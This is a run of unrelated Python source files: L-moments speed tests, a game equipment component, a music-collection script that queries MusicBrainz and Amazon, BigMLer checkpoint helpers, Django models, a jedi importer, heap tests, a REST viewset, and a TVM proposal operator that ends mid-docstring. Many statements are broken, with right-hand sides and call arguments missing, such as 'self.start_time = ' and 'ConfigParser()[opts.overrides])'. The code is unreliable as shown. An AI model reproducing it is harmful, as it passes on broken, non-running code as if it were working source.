import unittest from datetime import datetime import lmoments3 as lm from lmoments3 import distr import numpy as np class TestSamlmuSpeed(unittest.TestCase): @classmethod def setUpClass(cls): cls.n = 50 kappa_distr = distr.kap(loc=-0.7, scale=2.6, k=0.9, h=1.6) cls.record = kappa_distr.ppf(np.random.random(cls.n * 10000)) def setUp(self): self.start_time = def tearDown(self): duration = - self.start_time print("Test {} ran for {} s.".format(, duration.total_seconds())) def test_n50_nmom3(self): start_i = 0 for i in range(10000): l1, l2, t3 = lm.lmom_ratios(self.record[start_i:start_i + self.n], nmom=3) t2 = l2 / l1 start_i += self.n def test_n50_nmom4(self): start_i = 0 for i in range(10000): l1, l2, t3, t4 = lm.lmom_ratios(self.record[start_i:start_i + self.n], nmom=4) t2 = l2 / l1 start_i += self.n class TestKappaSpeed(unittest.TestCase): def setUp(self): self.start_time = def tearDown(self): duration = - self.start_time print("Test {} ran for {} s.".format(, duration.total_seconds())) def test_n50(self): n = 50 kappa_distr = distr.kap(loc=-0.7, scale=2.6, k=0.9, h=1.6) for i in range(10000): record = kappa_distr.ppf(np.random.random(n))
from components.component import Component from stats.enums import StatsEnum from itertools import chain from util.decorators import cached, invalidate_cache class Equipment(Component): NAME = "equipment" """ This component attaches itself to anything with a bodies. It represents equipment worn or wielded """ def __init__(self): super().__init__() self.host_body = None self.worn_equipment_map = {} self.wielded_equipment_map = {} def copy(self): # TODO Copying an equipment to another type of body would require some sort of validation. # TODO Removing or dropping invalid mappings. new_equipment = Equipment() new_equipment.host_body = self.host_body new_equipment.worn_equipment_map = self.__copy_all_items(self.worn_equipment_map) new_equipment.wielded_equipment_map = self.__copy_all_items(self.wielded_equipment_map) return new_equipment @staticmethod def __copy_all_items(collection): collection_copy = collection.copy() for index, item_list in enumerate(collection): collection_copy[index].clear() for item in item_list: collection_copy[index].append(item.copy()) return collection_copy def on_register(self, host): super().on_register(host) self.host_body = host.body @invalidate_cache def wear(self, item): # Wearing requires the bodypart to be compatible with the item if not self.host_body: self.host_body = if item.armor: armor = item.armor if item.stats.get_current_value(StatsEnum.Size) == for compatible_bodypart_uid in armor.wearable_body_parts_uid: host_body_parts = self.host_body.get_body_parts(compatible_bodypart_uid) for host_body_part in host_body_parts: if host_body_part: if host_body_part in self.worn_equipment_map: if armor.worn_layer not in [item.armor.worn_layer for item in self.worn_equipment_map[host_body_part]]: self.worn_equipment_map[host_body_part].append(item) return True else: self.worn_equipment_map[host_body_part] = [item] return True return False @invalidate_cache def wield(self, item): if not self.host_body: self.host_body = # Wielding requires bodyparts with GRASP grasp_able_body_parts = self.host_body.get_grasp_able_body_parts() # Wielding with one hand gets priority two_hands_wielders = [] for grasp_able_body_part in grasp_able_body_parts: if grasp_able_body_part in self.wielded_equipment_map: continue # 10 is the normal relative_size for a hand relative_size_modifier = grasp_able_body_part.relative_size - 10 relative_size_modifier = round(relative_size_modifier / 10) if relative_size_modifier else 0 relative_size = + relative_size_modifier item_size = int(item.stats.get_current_value(StatsEnum.Size)) if relative_size >= item_size >= relative_size - 2: # Can be wielded in one "hands" self.wielded_equipment_map[grasp_able_body_part] = item return True elif relative_size < item_size <= relative_size + 2: # Can be wielded in two "hands" two_hands_wielders.append(grasp_able_body_part) if len(two_hands_wielders) >= 2: first_wield = two_hands_wielders[0] second_wield = two_hands_wielders[1] self.wielded_equipment_map[first_wield] = item self.wielded_equipment_map[second_wield] = item return True return False @cached def get_worn_items(self): return [item for item_list in self.worn_equipment_map.values() for item in item_list] @cached def get_load_of_worn_items(self): worn_items = self.get_worn_items() total_weight = 0.0 for item in worn_items: item_weight = item.stats.get_current_value(StatsEnum.Weight) material_modifier = item.material.weight total_weight += item_weight * material_modifier return total_weight @cached def get_wielded_items(self): return [item for item in self.wielded_equipment_map.values()]
from mutagen import File from mutagen.asf import ASF, ASFTags from mutagen.apev2 import APEv2File from mutagen.flac import FLAC from mutagen.id3 import ID3FileType from mutagen.easyid3 import EasyID3 from mutagen.mp3 import MP3 from mutagen.oggflac import OggFLAC from mutagen.oggspeex import OggSpeex from mutagen.oggtheora import OggTheora from mutagen.oggvorbis import OggVorbis from mutagen.trueaudio import TrueAudio from mutagen.wavpack import WavPack from mutagen.mp4 import MP4, MP4Tags from mutagen.musepack import Musepack from mutagen.monkeysaudio import MonkeysAudio from mutagen.optimfrog import OptimFROG import amazon import logging import musicbrainz2.webservice as ws import musicbrainz2.model as m import sqlite3 from os import walk from os.path import splitext,join, abspath import sys from time import sleep, strptime, struct_time, localtime from types import IntType import math import codecs from genshi.template import NewTextTemplate from os import mkdir from os.path import exists from optparse import OptionParser from ConfigParser import ConfigParser parser = OptionParser() parser.add_option("-m","--music-dir",dest="directory",default=".",help="Pick music files directory. Default is current directory") parser.add_option("-d","--database",dest="db", default="songs.db",help="Songs database file") parser.add_option("--overrides", dest="overrides", default=None, help="Overrides info file") parser.add_option("--no-walk",dest="walk",default="True",action="store_false",help="Don't re-read music directory") parser.add_option("--artists-only", dest="artistsOnly", default="False", action="store_true", help="Write out simplified artists list") (opts,args) = parser.parse_args() overrides = {"artist": {}, "ignore": {}} if opts.overrides != None: cp = ConfigParser()[opts.overrides]) for section in cp.sections(): if section == "artist": overrides["artist"] = dict(cp.items(section)) elif section == "ignore": overrides["ignore"] = cp.options(section) else: raise Exception, section class EasyMP3(MP3): def __init__(self, *args, **kwargs): kwargs['ID3'] = EasyID3 MP3.__init__(self,*args, **kwargs) class EasierTags: def __getitem__(self, key): if key in self.simpler.keys(): return self._parent.__getitem__(self,self.simpler[key]) else: return self._parent.__getitem__(self, key) class EasyMP4Tags(MP4Tags, EasierTags): simpler = {"title":"\xa9nam","artist":"\xa9ART","album":"\xa9alb"} class EasyMP4(MP4): def load(self, filename): MP4.load(self,filename) self.tags.__class__ = EasyMP4Tags class EasyASFTags(EasierTags, ASFTags): _parent = ASFTags simpler = {"title":"Title"} class EasyASF(ASF): def load(self, filename): ASF.load(self,filename) self.tags.__class__ = EasyASFTags options = [EasyMP3, TrueAudio, OggTheora, OggSpeex, OggVorbis, OggFLAC, FLAC, APEv2File, EasyMP4, ID3FileType, WavPack, Musepack, MonkeysAudio, OptimFROG, EasyASF] doregen = True con = sqlite3.connect(opts.db) cur = con.cursor() cur.execute("select name from sqlite_master where type='table' and name='songs'") if len(cur.fetchall())==0: cur.execute("create table songs (fullpath text(300) primary key, artist text(100),album text(100),title text(100),duration integer);") con.commit() if opts.walk: for path, dirs, files in walk( for f in files: if f[0] == ".": continue # ignore hidden files try: fp = unicode(abspath(join(path,f)),"utf_8","ignore") except UnicodeDecodeError: print type(join(path,f)),path,f raise cur.execute("select artist,album,title,duration from songs where fullpath=?", (fp,)) d = cur.fetchall() if d==[]: try: data = File(fp, options=options) except IOError,e: print e print "rebuilding song db" data = None if data == None: cur.execute("insert into songs (fullpath,duration) values(?,?)",(fp, -1)) con.commit() continue try: try: artist = data["artist"][0].strip() except KeyError: artist = unicode("") try: album = data["album"][0].strip() except KeyError: album = unicode("") try: title = data["title"][0].strip() except KeyError: title = unicode("") duration = int( print (fp, artist, album, title, duration) cur.execute("insert into songs values(?,?,?,?,?)",(fp, artist, album, title, duration)) con.commit() except KeyError: print fp,data.keys() raise cur.execute("select artist,album, count(title) from songs group by artist,album having count(title)>2 and artist!=\"\"") artists = {} lower = {} d = cur.fetchall() #print d for (artist, album,title) in d: if artist.lower() in lower: artist = lower[artist.lower()] if artist not in artists: artists[artist] = {} lower[artist.lower()] = artist artists[artist][album] = title #print artists.keys() logging.basicConfig() logger = logging.getLogger() #logger.setLevel(logging.DEBUG) def getAlbums(artist): cur.execute("select album, asin, date, ep from musicbrainz where artist=?", (artist,)) d = cur.fetchall() if d == []: q = ws.Query() f = ws.ArtistFilter(query=artist, limit=5) while True: try: artistResults = q.getArtists(f) break except BaseException, e: print "problem during artist name", e sleep(5) ret = {} for artistResult in artistResults: print "name", artist_id = release_ids = [] for kind in (m.Release.TYPE_ALBUM, m.Release.TYPE_EP, m.Release.TYPE_SOUNDTRACK, m.Release.TYPE_LIVE): while True: try: # The result should include all official albums. # inc = ws.ArtistIncludes( releases=(m.Release.TYPE_OFFICIAL, kind), tags=True) release_ids.extend([(,kind) for x in q.getArtistById(artist_id, inc).getReleases()]) break except BaseException, e: print "problem during releases", e sleep(5) if release_ids == []: print "No releases found for %s"%artist continue print "release ids", release_ids ret = {} lower = {} for (id,kind) in release_ids: inc = ws.ReleaseIncludes(artist=True, releaseEvents=True) while True: try: release = q.getReleaseById(id, inc) break except BaseException, e: print "problem during release", e sleep(5) if release.asin == None: # ignore these print "skipping because no ASIN:", id, release.title continue title = release.title if title.find("(disc ")!=-1: title = title[:title.find("(disc ")].strip() #assert title not in ret.keys(),(title, release) if title.lower() in lower: title = lower[title.lower()] else: lower[title.lower()] = title ret[title] = {"when":release.getEarliestReleaseDate(), "asin":release.asin, "ep": kind == m.Release.TYPE_EP} print "got", title if ret == {}: print "no usable releases" continue else: break if ret == {}: raise Exception, "No usable albums/artists found for %s. Try fixing one of the entries marked 'skipping because no ASIN', or add to the ignore list"%artist for title in ret: cur.execute("insert into musicbrainz values(?, ?, ?, ?, ?)", (artist, title, ret[title]["asin"], ret[title]["when"], ret[title]["ep"])) con.commit() else: ret = {} lower = {} for (album, asin, when, ep) in d: if album.lower() in lower: album = lower[album.lower()] else: lower[album.lower()] = album ret[album] = {"asin":asin, "when":when, "ep": ep} keys = ret.keys() for title in keys: if title.find("(")!=-1: stripped = title[:title.find("(")].strip() if len(stripped)>0 and stripped[-1] == ".": stripped = stripped[:-1] if stripped in ret.keys(): print "removed", title, stripped del ret[title] continue try: ret[title]["when"] = strptime(ret[title]["when"], "%Y-%m-%d") except ValueError: if ret[title]["when"].find("-")!=-1: ret[title]["when"] = struct_time((int(ret[title]["when"][:ret[title]["when"].find("-")]),0,0,0,0,0,0,0,0)) else: ret[title]["when"] = struct_time((int(ret[title]["when"]),0,0,0,0,0,0,0,0)) except TypeError: if type(ret[title]["when"]) == IntType: ret[title]["when"] = struct_time((ret[title]["when"],0,0,0,0,0,0,0,0)) elif ret[title]["when"] == None: pass else: raise return ret most_tracks = [x for x in sorted(artists.keys(), lambda x,y:cmp(sum(artists[y].values()), sum(artists[x].values()))) if sum(artists[x].values())>3] print most_tracks cur.execute("select name from sqlite_master where type='table' and name='musicbrainz'") if len(cur.fetchall())==0: cur.execute("create table musicbrainz (artist text(100), album text(100), asin text(20), date integer, ep boolean, primary key(artist, album));") con.commit() cur.execute("select name from sqlite_master where type='table' and name='amazon'") if len(cur.fetchall())==0: cur.execute("create table amazon (artist text(100), album text(100), url text(500), image text(500), amazon_new integer, primary key(artist, album));") con.commit() def compact(inp): inp = inp.lower() return inp.replace("'","").replace(","," ").replace("&"," ").replace(":", " ").replace(".", " ") missing = {} for artist in most_tracks: if artist.lower() in overrides["artist"]: newartist = overrides["artist"][artist.lower()] artists[newartist] = artists[artist] del artists[artist] artist = newartist if artist.lower() in overrides["ignore"]: continue print "artist",artist, type(artist), artist.encode("utf-8") albums = getAlbums(artist) print artist, albums.keys(), artists[artist] newest = None for got_a in artists[artist].keys(): use_a = None if got_a in albums.keys(): use_a = got_a else: items = [x for x in compact(got_a).split() if x not in ("(ep)",)] for k in albums.keys(): for i in items: if i not in compact(k): break else: #print "found all bits", items, k use_a = k break if use_a != None: if newest == None or newest < albums[use_a]['when']: newest = albums[use_a]['when'] else: print "Can't find '%s'"%got_a, albums.keys() for a in albums.keys(): if albums[a]['when'] > newest and not albums[a]['ep']: #print "don't have",a, albums[a]['asin'], artist cur.execute("select url, image, amazon_new from amazon where artist=? and album=?",(artist, a)) d = cur.fetchall() if d == []: results = amazon.searchByTitle(artist, a) cur.execute("insert into amazon values(?, ?, ?, ?, ?)",(artist, a, unicode(results["url"]), unicode(results["image"]), results["amazon_new"])) con.commit() else: d = d[0] def realNone(x): if x == "None": return None else: return x d = [realNone(x) for x in d] results = {"title":a, "url":d[0], "image":d[1], "amazon_new":d[2]} print "missing",results, albums[a]['when'], artist when = albums[a]['when'] if when not in missing: missing[when] = [] results["artist"] = artist results["when"] = when missing[when].append(results) #raise Exception,albums[a] #break artists = {} if opts.artistsOnly: for when in sorted(missing, reverse = True): for m in missing[when]: if m["artist"] not in artists: artists[m["artist"]] = [] artists[m["artist"]].append(m["title"]) f ="artists.txt", "wb", "utf-8") for a in sorted(artists): f.write(u"%s - %s\n"%(a, ", ".join(artists[a]))) f.close() sys.exit(0) folder = "output" if not exists(folder): mkdir(folder) flattened = [] for key in sorted(missing, reverse = True): if key > localtime(): # ignore items not released yet continue flattened.extend([x for x in missing[key] if x["url"]!=None]) count = len(flattened) perpage = 10 pages = int(math.ceil(count/(perpage*1.0))) print count, pages links = [("1", "index.html")] + [(str(x), "index%03d.html"%x) for x in range(2, pages+1)] for start in range(0, count, perpage): index = (start/perpage) + 1 if index == 1: name = "index.html" else: name = "index%03d.html"%index print flattened[start:start+perpage] nt = NewTextTemplate(file("template.html").read()) open(join(folder,name), "wb").write(nt.generate(albums = flattened[start:start+perpage], links = links, index = str(index)).render())
# -*- coding: utf-8 -*- # # Copyright 2012-2015 BigML # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Checkpoint functions for BigMLer """ from __future__ import absolute_import import os import bigml.api from bigml.util import console_log from bigmler.utils import log_message def is_source_created(path, suffix=""): """Checks existence and reads the source id from the source file in the path directory """ source_id = None try: with open("%s%ssource%s" % (path, os.sep, suffix)) as source_file: source_id = source_file.readline().strip() try: source_id = bigml.api.get_source_id(source_id) return True, source_id except ValueError: return False, None except IOError: return False, None def is_dataset_created(path, suffix=""): """Checks existence and reads the dataset id from the dataset file in the path directory """ dataset_id = None try: with open("%s%sdataset%s" % (path, os.sep, suffix)) as dataset_file: dataset_id = dataset_file.readline().strip() try: dataset_id = bigml.api.get_dataset_id(dataset_id) return True, dataset_id except ValueError: return False, None except IOError: return False, None def are_datasets_created(path, number_of_datasets, suffix='parts'): """Checks existence and reads the dataset ids from the datasets file in the path directory """ dataset_ids = [] try: with open("%s%sdataset_%s" % (path, os.sep, suffix)) as datasets_file: for line in datasets_file: dataset = line.strip() try: dataset_id = bigml.api.get_dataset_id(dataset) dataset_ids.append(dataset_id) except ValueError: return False, dataset_ids if len(dataset_ids) == number_of_datasets: return True, dataset_ids else: return False, dataset_ids except IOError: return False, dataset_ids def are_models_created(path, number_of_models): """Checks existence and reads the model ids from the models file in the path directory """ model_ids = [] try: with open("%s%smodels" % (path, os.sep)) as models_file: for line in models_file: model = line.strip() try: model_id = bigml.api.get_model_id(model) model_ids.append(model_id) except ValueError: return False, model_ids if len(model_ids) == number_of_models: return True, model_ids else: return False, model_ids except IOError: return False, model_ids def are_predictions_created(predictions_file, number_of_tests): """Checks existence and reads the predictions from the predictions file in the path directory """ predictions = file_number_of_lines(predictions_file) if predictions != number_of_tests: os.remove(predictions_file) return False, None return True, None def is_evaluation_created(path): """Checks existence and reads the evaluation id from the evaluation file in the path directory """ evaluation_id = None try: with open("%s%sevaluation" % (path, os.sep)) as evaluation_file: evaluation_id = evaluation_file.readline().strip() try: evaluation_id = bigml.api.get_evaluation_id(evaluation_id) return True, evaluation_id except ValueError: return False, None except IOError: return False, None def are_evaluations_created(path, number_of_evaluations): """Checks existence and reads the evaluation ids from the evaluations file in the path directory and checks the corresponding evaluations """ evaluation_ids = [] try: with open("%s%sevaluations" % (path, os.sep)) as evaluations_file: for line in evaluations_file: evaluation = line.strip() try: evaluation_id = bigml.api.get_evaluation_id(evaluation) evaluation_ids.append(evaluation_id) except ValueError: return False, evaluation_ids if len(evaluation_ids) == number_of_evaluations: return True, evaluation_ids else: return False, evaluation_ids except IOError: return False, evaluation_ids def are_ensembles_created(path, number_of_ensembles): """Checks and reads the ensembles ids from the ensembles file in the path directory """ ensemble_ids = [] try: with open("%s%sensembles" % (path, os.sep)) as ensembles_file: for line in ensembles_file: ensemble = line.strip() try: ensemble_id = bigml.api.get_ensemble_id(ensemble) ensemble_ids.append(ensemble_id) except ValueError: return False, ensemble_ids if len(ensemble_ids) == number_of_ensembles: return True, ensemble_ids else: return False, ensemble_ids except IOError: return False, ensemble_ids def checkpoint(function, *args, **kwargs): """Redirects to each checkpoint function """ common_parms = ['debug', 'message', 'log_file', 'console'] debug = kwargs.get('debug', False) message = kwargs.get('message', None) log_file = kwargs.get('log_file', None) console = kwargs.get('console', False) f_kwargs = {key: value for key, value in kwargs.items() if not key in common_parms} result = function(*args, **f_kwargs) if debug: console_log("Checkpoint: checking %s with args:\n%s\n\nResult:\n%s\n" % (function.__name__, "\n".join([repr(arg) for arg in args]), repr(result))) # resume is the first element in the result tuple if not result[0] and message is not None: log_message(message, log_file=log_file, console=console) return result def file_number_of_lines(file_name): """Counts the number of lines in a file """ try: item = (0, None) with open(file_name) as file_handler: for item in enumerate(file_handler): pass return item[0] + 1 except IOError: return 0 def is_batch_prediction_created(path): """Checks existence and reads the batch prediction id from the batch_prediction file in the path directory """ batch_prediction_id = None try: with open("%s%sbatch_prediction" % (path, os.sep)) as batch_prediction_file: batch_prediction_id = batch_prediction_file.readline().strip() try: batch_prediction_id = bigml.api.get_batch_prediction_id( batch_prediction_id) return True, batch_prediction_id except ValueError: return False, None except IOError: return False, None def is_batch_centroid_created(path): """Checks existence and reads the batch centroid id from the batch_centroid file in the path directory """ batch_centroid_id = None try: with open("%s%sbatch_centroid" % (path, os.sep)) as batch_prediction_file: batch_centroid_id = batch_prediction_file.readline().strip() try: batch_centroid_id = bigml.api.get_batch_centroid_id( batch_centroid_id) return True, batch_centroid_id except ValueError: return False, None except IOError: return False, None def are_clusters_created(path, number_of_clusters): """Checks existence and reads the cluster ids from the clusters file in the path directory """ cluster_ids = [] try: with open("%s%sclusters" % (path, os.sep)) as clusters_file: for line in clusters_file: cluster = line.strip() try: cluster_id = bigml.api.get_cluster_id(cluster) cluster_ids.append(cluster_id) except ValueError: return False, cluster_ids if len(cluster_ids) == number_of_clusters: return True, cluster_ids else: return False, cluster_ids except IOError: return False, cluster_ids def is_dataset_exported(filename): """Checks the existence of the CSV exported dataset file """ try: with open(filename): return True except IOError: return False def is_batch_anomaly_score_created(path): """Checks existence and reads the batch anomaly score id from the batch_anomaly_score file in the path directory """ batch_anomaly_score_id = None try: with open("%s%sbatch_anomaly_score" % (path, os.sep)) as batch_prediction_file: batch_anomaly_score_id = batch_prediction_file.readline().strip() try: batch_anomaly_score_id = bigml.api.get_batch_anomaly_score_id( batch_anomaly_score_id) return True, batch_anomaly_score_id except ValueError: return False, None except IOError: return False, None def are_anomalies_created(path, number_of_anomalies): """Checks existence and reads the anomaly detector ids from the anomalies file in the path directory """ anomaly_ids = [] try: with open("%s%sanomalies" % (path, os.sep)) as anomalies_file: for line in anomalies_file: anomaly = line.strip() try: anomaly_id = bigml.api.get_anomaly_id(anomaly) anomaly_ids.append(anomaly_id) except ValueError: return False, anomaly_ids if len(anomaly_ids) == number_of_anomalies: return True, anomaly_ids else: return False, anomaly_ids except IOError: return False, anomaly_ids def is_project_created(path): """Checks existence and reads project id from the project file in the path directory """ project_id = None try: with open("%s%sproject" % (path, os.sep)) as project_file: project_id = project_file.readline().strip() try: project_id = bigml.api.get_project_id( project_id) return True, project_id except ValueError: return False, None except IOError: return False, None def are_samples_created(path, number_of_samples): """Checks existence and reads the samples ids from the samples file in the path directory """ sample_ids = [] try: with open("%s%ssamples" % (path, os.sep)) as samples_file: for line in samples_file: sample = line.strip() try: sample_id = bigml.api.get_sample_id(sample) sample_ids.append(sample_id) except ValueError: return False, sample_ids if len(sample_ids) == number_of_samples: return True, sample_ids else: return False, sample_ids except IOError: return False, sample_ids
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models from django.contrib.auth.models import User from django.utils import timezone from datetime import datetime from django.utils.encoding import python_2_unicode_compatible @python_2_unicode_compatible class MethodologyMaster(models.Model): name = models.CharField(max_length=100) description = models.TextField(default="") order = models.IntegerField(default=0) created_by = models.ForeignKey(User, related_name="methodology_created_by", null=True, on_delete=models.CASCADE) created = models.DateTimeField( updated_by = models.ForeignKey(User, related_name="methodology_updated_by", null=True, on_delete=models.CASCADE) updated = models.DateTimeField( def __str__(self): # __unicode__ on Python 2 return def save(self, *args, **kwargs): if not self.created = self.updated = return super(MethodologyMaster, self).save(*args, **kwargs) class Meta: ordering = ('name',) @python_2_unicode_compatible class ModuleMaster(models.Model): name = models.CharField(max_length=100) description = models.TextField(default="") order = models.IntegerField(default=0) methodology = models.ForeignKey(MethodologyMaster, on_delete=models.CASCADE, null=True, default=None) created_by = models.ForeignKey(User, related_name="module_created_by", null=True, on_delete=models.CASCADE) created = models.DateTimeField( updated_by = models.ForeignKey(User, related_name="module_updated_by", null=True, on_delete=models.CASCADE) updated = models.DateTimeField( def __str__(self): # __unicode__ on Python 2 return def save(self, *args, **kwargs): if not self.created = self.updated = return super(ModuleMaster, self).save(*args, **kwargs) class Meta: ordering = ('name',) @python_2_unicode_compatible class CaseMaster(models.Model): name = models.CharField(max_length=100) module = models.ForeignKey(ModuleMaster, on_delete=models.CASCADE) description = models.TextField(default="") order = models.IntegerField(default=0) created_by = models.ForeignKey(User, related_name="case_module_created_by", null=True, on_delete=models.CASCADE) created = models.DateTimeField( updated_by = models.ForeignKey(User, related_name="case_module_updated_by", null=True, on_delete=models.CASCADE) updated = models.DateTimeField( def __str__(self): # __unicode__ on Python 2 return def save(self, *args, **kwargs): if not self.created = self.updated = return super(CaseMaster, self).save(*args, **kwargs) class Meta: ordering = ('name',)
""" Module to handle interpreted Python objects. """ import itertools import tokenize from jedi import parsing_representation as pr class ObjectImporter(object): """ Import objects in "raw" namespace such as :func:`locals`. """ def __init__(self, scope): self.scope = scope count = itertools.count() self._genname = lambda: '*jedi-%s*' % next(count) """ Generate unique variable names to avoid name collision. To avoid name collision to already defined names, generated names are invalid as Python identifier. """ def import_raw_namespace(self, raw_namespace): """ Import interpreted Python objects in a namespace. Three kinds of objects are treated here. 1. Functions and classes. The objects imported like this:: from os.path import join 2. Modules. The objects imported like this:: import os 3. Instances. The objects created like this:: from datetime import datetime dt = datetime(2013, 1, 1) :type raw_namespace: dict :arg raw_namespace: e.g., the dict given by `locals` """ scope = self.scope for (variable, obj) in raw_namespace.items(): objname = getattr(obj, '__name__', None) # Import functions and classes module = getattr(obj, '__module__', None) if module and objname: fakeimport = self.make_fakeimport(module, objname, variable) scope.add_import(fakeimport) continue # Import modules if getattr(obj, '__file__', None) and objname: fakeimport = self.make_fakeimport(objname) scope.add_import(fakeimport) continue # Import instances objclass = getattr(obj, '__class__', None) module = getattr(objclass, '__module__', None) if objclass and module: alias = self._genname() fakeimport = self.make_fakeimport(module, objclass.__name__, alias) fakestmt = self.make_fakestatement(variable, alias, call=True) scope.add_import(fakeimport) scope.add_statement(fakestmt) continue def make_fakeimport(self, module, variable=None, alias=None): """ Make a fake import object. The following statements are created depending on what parameters are given: - only `module`: ``import <module>`` - `module` and `variable`: ``from <module> import <variable>`` - all: ``from <module> import <variable> as <alias>`` :type module: str :arg module: ``<module>`` part in ``from <module> import ...`` :type variable: str :arg variable: ``<variable>`` part in ``from ... import <variable>`` :type alias: str :arg alias: ``<alias>`` part in ``... import ... as <alias>``. :rtype: :class:`parsing_representation.Import` """ submodule = self.scope._sub_module if variable: varname = pr.Name( module=submodule, names=[(variable, (-1, 0))], start_pos=(-1, 0), end_pos=(None, None)) else: varname = None modname = pr.Name( module=submodule, names=[(module, (-1, 0))], start_pos=(-1, 0), end_pos=(None, None)) if alias: aliasname = pr.Name( module=submodule, names=[(alias, (-1, 0))], start_pos=(-1, 0), end_pos=(None, None)) else: aliasname = None if varname: fakeimport = pr.Import( module=submodule, namespace=varname, from_ns=modname, alias=aliasname, start_pos=(-1, 0), end_pos=(None, None)) else: fakeimport = pr.Import( module=submodule, namespace=modname, alias=aliasname, start_pos=(-1, 0), end_pos=(None, None)) return fakeimport def make_fakestatement(self, lhs, rhs, call=False): """ Make a fake statement object that represents ``lhs = rhs``. :type call: bool :arg call: When `call` is true, make a fake statement that represents ``lhs = rhs()``. :rtype: :class:`parsing_representation.Statement` """ submodule = self.scope._sub_module lhsname = pr.Name( module=submodule, names=[(lhs, (0, 0))], start_pos=(0, 0), end_pos=(None, None)) rhsname = pr.Name( module=submodule, names=[(rhs, (0, 0))], start_pos=(0, 0), end_pos=(None, None)) token_list = [lhsname, (tokenize.OP, '=', (0, 0)), rhsname] if call: token_list.extend([ (tokenize.OP, '(', (0, 0)), (tokenize.OP, ')', (0, 0)), ]) return pr.Statement( module=submodule, set_vars=[lhsname], used_vars=[rhsname], token_list=token_list, start_pos=(0, 0), end_pos=(None, None))
from TestDummyObjectMaker import DailySortingTestObject from SpaceUnitTest import SpaceUnitTest from collections import OrderedDict from Heap import Heap import random class Test_Heap(SpaceUnitTest): def setUp(self): self.testList = [] self.controlList = [] for i in range(0,500): u = i // 100 r = (500 -i) // 25 f = i tObj = DailySortingTestObject(u,r,f) self.testList.append(tObj) self.controlList.append(tObj) random.shuffle(self.testList) print("done") return super().setUp() def tearDown(self): return super().tearDown() def test_heap_basic_functions(self): heap = Heap(lambda x,y: x > y) self.assertTrue(heap.is_empty()) self.assertEqual(len(heap),0) heap.push(5) self.assertEqual(len(heap),1) heap.push_list([3,8,1,4]) self.assertEqual(len(heap),5) def test_heapsort(self): heap1 = Heap(lambda x,y: x > y) presorted = [] for i in range(0,1000): randNum = random.randint(0,1000) presorted.append(randNum) heap1.push(randNum) sorted = heap1.get_sorted_list() prev = sorted[0] for s in sorted: self.assertTrue(s <= prev) prev = s presorted.sort() self.assertTrue(heap1.is_empty()) for p in presorted: heap1.push(p) sorted1 = heap1.get_sorted_list() prev = sorted1[0] for s in sorted1: self.assertTrue(s <= prev) prev = s presorted.reverse() self.assertTrue(heap1.is_empty()) for p in presorted: heap1.push(p) sorted2 = heap1.get_sorted_list() prev = sorted2[0] for s in sorted2: self.assertTrue(s <= prev) prev = s self.assertTrue(heap1.is_empty()) for i in range(0,1000): heap1.push(random.randint(0,1000)) prev = heap1.pop() for p in heap1.popper(): self.assertTrue(s <= prev) prev = s def test_multifield_heapsort(self): heap = Heap(lambda a,b: a.daysUntilTrigger <= b.daysUntilTrigger and a.urgency >= b.urgency and a.difficulty <= b.difficulty) heap.push_list(self.testList) for a,c in zip(heap.popper(),self.controlList): self.assertEqual(a.daysUntilTrigger,c.daysUntilTrigger) self.assertEqual(a.urgency,c.urgency) self.assertEqual(a.difficulty,c.difficulty) if __name__ == '__main__': unittest.main()
# pylint: disable=too-many-ancestors """ View Set for personalised Gym api """ from rest_framework import viewsets from app.models.profile import Profile from app.models.raid_item import RaidItem from app.serializers.raid_item import RaidItemSerializer from app.views.view_sets.common import paginate_raids class UserRaidsViewSet(viewsets.GenericViewSet): """ View Set for active raids on Gyms the logged in user is following """ serializer_class = RaidItemSerializer def get_queryset(self): """ Override the queryset """ profile = Profile.objects.get(user=self.request.user) gyms = profile.tracked_gyms.all() return RaidItem.objects.filter(gym__in=gyms).order_by('id') def list(self, request): """ Define response for the listing of active raids on the user's tracked gyms :param request: Django Request :return: Django Rest Framework Response """ queryset = self.get_queryset() return paginate_raids(self, request, queryset)
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # pylint: disable=invalid-name """Proposal operator""" import math import tvm def generate_anchor(ratio, scale, base_size): """Generate anchor""" w = h = float(base_size) x_ctr = 0.5 * (w - 1.) y_ctr = 0.5 * (h - 1.) size = w * h size_ratios = math.floor(size / ratio) new_w = math.floor(math.sqrt(size_ratios) + 0.5) * scale new_h = math.floor((new_w / scale * ratio) + 0.5) * scale return (x_ctr - 0.5 * (new_w - 1.0), y_ctr - 0.5 * (new_h - 1.0), x_ctr + 0.5 * (new_w - 1.0), y_ctr + 0.5 * (new_h - 1.0)) def reg_bbox(x1, y1, x2, y2, dx, dy, dw, dh): """Bounding box regression function""" bbox_w = x2 - x1 + 1.0 bbox_h = y2 - y1 + 1.0 ctr_x = x1 + 0.5 * (bbox_w - 1.0) ctr_y = y1 + 0.5 * (bbox_h - 1.0) pred_ctr_x = dx * bbox_w + ctr_x pred_ctr_y = dy * bbox_h + ctr_y pred_w = tvm.exp(dw) * bbox_w pred_h = tvm.exp(dh) * bbox_h pred_x1 = pred_ctr_x - 0.5 * (pred_w - 1.0) pred_y1 = pred_ctr_y - 0.5 * (pred_h - 1.0) pred_x2 = pred_ctr_x + 0.5 * (pred_w - 1.0) pred_y2 = pred_ctr_y + 0.5 * (pred_h - 1.0) return pred_x1, pred_y1, pred_x2, pred_y2 def reg_iou(x1, y1, x2, y2, dx1, dy1, dx2, dy2): """Bounding box regression function""" pred_x1 = x1 + dx1 pred_y1 = y1 + dy1 pred_x2 = x2 + dx2 pred_y2 = y2 + dy2 return pred_x1, pred_y1, pred_x2, pred_y2 def proposal(cls_prob, bbox_pred, im_info, scales, ratios, feature_stride, threshold, rpn_pre_nms_top_n, rpn_post_nms_top_n, rpn_min_size, iou_loss): """Proposal operator. Parameters ---------- cls_prob : tvm.Tensor 4-D with shape [batch, 2 * num_anchors, height, width] 